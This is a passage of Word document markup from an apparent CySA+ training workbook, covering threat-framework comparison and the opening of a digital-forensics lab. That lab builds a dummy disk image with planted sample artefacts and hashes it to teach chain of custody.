          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        │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xml:space="preserve">                  │   Victim   │  Finance dept, 1 user, file server</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">                  └────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Each pivot (Adversary, Capability, Infrastructure, Victim) is a query you can run against your SIEM and threat-intel sources.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Compare frameworks</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fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Strength</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
            <w:shd w:val="clear" w:fill="1F6FEB"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>When to use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Cyber Kill Chain</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Simple 7-stage narrative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Exec briefing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>MITRE ATT&amp;CK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Rich TTP taxonomy with detections</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Hunt + detect engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Diamond Model</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Pivots across actor/infra/victim</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Threat-intel analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OWASP Testing Guide</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Web app pentest methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>App-sec engagements</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>OSSTMM</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Holistic security testing methodology</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3168"/>
          </w:tcPr>
          <w:p>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
                <w:color w:val="161B26"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Comprehensive audits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CySA+ expects you to know what each framework is for — pick the right one for the audience.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Save artefacts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/lab20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "{ /* exported ATT&amp;CK Navigator JSON pasted here */ }" &gt; /tmp/lab20/attack_layer.json</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These artefacts feed into the incident report deliverable (Lab 27).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Walk a realistic intrusion through the 7-stage Cyber Kill Chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Build an ATT&amp;CK Navigator layer by mapping each scenario step to a technique ID.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Apply the Diamond Model to enumerate pivot opportunities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Choose the right framework for the analytic question at hand.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Browser-Based Tools (Tertiary Infotech)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>These free browser tools complement this lab — no install required:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cybersecurity Simulator (https://alfredang.github.io/cybersecuritysimulator/) — an interactive browser simulator for practising security-analyst decisions.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>*In this lab:* Use the Cybersecurity Simulator to walk through the kill-chain / ATT&amp;CK decision points as you map the intrusion.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You should be able to walk a realistic intrusion through the 7-stage Cyber Kill Chain.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 21 — Evidence Acquisition and Chain of Custody</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perform a forensically sound image of a "compromised" disk and memory, generate hashes, fill in a chain-of-custody form, and verify integrity.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will perform a forensically sound image of a "compromised" disk and memory, generate hashes, fill in a chain-of-custody form, and verify integrity. This maps to CySA+ 3.2 (Evidence acquisitions — Chain of custody, Validating data integrity, Preservation, Legal hold).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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Ubuntu Playground</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="3463290"/>
            <wp:docPr id="17" name="Picture 17"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_c9d66737d4.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="3463290"/>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4937760" cy="2876365"/>
            <wp:docPr id="18" name="Picture 18"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_fff1869550.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2876365"/>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4937760" cy="2786905"/>
            <wp:docPr id="19" name="Picture 19"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_a056dc1946.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId27"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2786905"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Why order matters: order of volatility</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Before touching the system, recall the volatility ladder (most-to-least volatile):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>CPU registers, cache</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Routing table, ARP cache, process table, kernel statistics, memory</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Temporary file systems / swap</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">4. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Disk</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">5. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Remote logs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="504"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">6. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Backups / archival media</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Capture in that order. Skip ahead and you destroy evidence you cannot recover.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Create a controlled "evidence" target</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/evidence /tmp/case_001</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>dd if=/dev/zero of=/tmp/evidence/suspect.img bs=1M count=8 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkfs.ext4 -F /tmp/evidence/suspect.img &gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /mnt/suspect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mount -o loop /tmp/evidence/suspect.img /mnt/suspect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "stolen_creds: admin/p@ssw0rd" &gt; /mnt/suspect/secret.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo "C2: 185.220.101.45" &gt; /mnt/suspect/c2.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>umount /mnt/suspect</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>You now have an 8 MB "disk" with two artefacts.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Hash the source BEFORE imaging (preservation)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum /tmp/evidence/suspect.img | tee /tmp/case_001/source.sha256</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
